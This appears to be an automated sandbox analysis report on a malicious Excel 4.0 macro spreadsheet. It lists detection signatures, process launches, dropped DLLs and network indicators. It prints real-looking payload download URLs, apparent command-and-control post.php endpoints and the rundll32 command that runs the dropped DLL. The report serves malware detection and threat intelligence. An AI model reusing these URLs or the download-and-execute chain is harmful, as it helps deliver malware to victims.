Play interactive tour

Edit tour

Analysis Report case (1522).xls

Overview

General Information

Sample Name:	case (1522).xls
Analysis ID:	344663
MD5:	933ac69cb772d6e28636a81fc7665a26
SHA1:	7bb7870ebb261a2e0302600330abbc819d00acd3
SHA256:	d4592471179f7d3fbd94be05591c09c74b0d8b7dcca580504694c7514c1d9ef0
Tags:	xls
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malicious Excel 4.0 Macro

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to inject code into remote processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Found malicious URLs in unpacked macro 4.0 sheet

Found obfuscated Excel 4.0 Macro

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected hidden Macro 4.0 in Excel

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the product ID of Windows

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2260 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2464 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2364 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

msiexec.exe (PID: 2416 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
case (1522).xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2260, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2464

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Source: 4.2.rundll32.exe.2330000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 5.2.msiexec.exe.90000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2165783803.0000000002A80000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: scfrd[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 00000000h	4_2_0234DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then add esi, 02h	4_2_0234CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 0000000Ah	4_2_0233D830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	4_2_02348830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 0000000Ah	5_2_0009D830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	5_2_000A8830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	5_2_000ACE40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	5_2_000ADA70

Source: global traffic

DNS query: name: rnollg.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443

Networking:

Found malicious URLs in unpacked macro 4.0 sheet

Show sources

Source: before.1.0.0.sheet.csv_unpack

Macro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_00091AF0 InternetReadFile,

5_2_00091AF0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: rnollg.com

Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicertP
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://crt.comod
Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: msiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 77EE0000.0.dr	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
Source: case (1522).xls	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
Source: msiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/
Source: msiexec.exe, 00000005.00000003.2168531557.00000000003AA000.00000004.00000001.sdmp	String found in binary or memory: https://gadgetswolf.com/post.php
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/post.php_
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/post.phpi
Source: msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmp	String found in binary or memory: https://govemedico.tk/
Source: msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmp	String found in binary or memory: https://govemedico.tk/7
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: https://govemedico.tk/post.php
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: https://homesoapmolds.com/
Source: msiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmp	String found in binary or memory: https://homesoapmolds.com/post.php
Source: msiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmp	String found in binary or memory: https://homesoapmolds.com/post.phpr
Source: msiexec.exe, 00000005.00000002.2362168955.0000000002F60000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: before.1.0.0.sheet.csv_unpack	String found in binary or memory: https://rnollg.com/kev/scfrd.dll
Source: case (1522).xls, 77EE0000.0.dr	String found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: case (1522).xls

Initial sample: URLDownloadToFileA

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content X E14 - "" jR V \ A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: case (1522).xls	Initial sample: CALL
Source: case (1522).xls	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: case (1522).xls

Initial sample: Sheet size: 503434

Found obfuscated Excel 4.0 Macro

Show sources

Source: case (1522).xls

Initial sample: High usage of CHAR() function: 147

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02333A30	4_2_02333A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0234DA70	4_2_0234DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02339A60	4_2_02339A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02345BF0	4_2_02345BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02339C60	4_2_02339C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023FD2C4	4_2_023FD2C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023FBB6E	4_2_023FBB6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023FD806	4_2_023FD806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023FF8FD	4_2_023FF8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023FDD48	4_2_023FDD48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00099C60	5_2_00099C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00093A30	5_2_00093A30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00099A60	5_2_00099A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000ADA70	5_2_000ADA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000A5BF0	5_2_000A5BF0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890

Source: ipnyw.dll.5.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.expl.evad.winXLS@7/12@4/4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000A9C90 AdjustTokenPrivileges,

5_2_000A9C90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_023469A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_023469A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\77EE0000

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD900.tmp

Jump to behavior

Source: case (1522).xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2165783803.0000000002A80000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

Source: case (1522).xls

Initial sample: OLE summary lastprinted = 2021-01-26 16:17:13

Source: case (1522).xls

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0233D830 LoadLibraryA,GetProcAddress,

4_2_0233D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0235EA51 push esi; retf	4_2_0235EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02359A5D push ebp; iretd	4_2_02359AEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023582EB push eax; ret	4_2_0235834A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023F93ED push ecx; ret	4_2_023F9400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0235D1F2 push dword ptr [ecx]; iretd	4_2_0235D1F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0235E9FA push esi; retf	4_2_0235EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0235B700 push ss; ret	4_2_0235B735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0235B56F push esp; ret	4_2_0235B581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02412B73 push esi; ret	4_2_02412B75

Persistence and Installation Behavior:

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\formnet.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
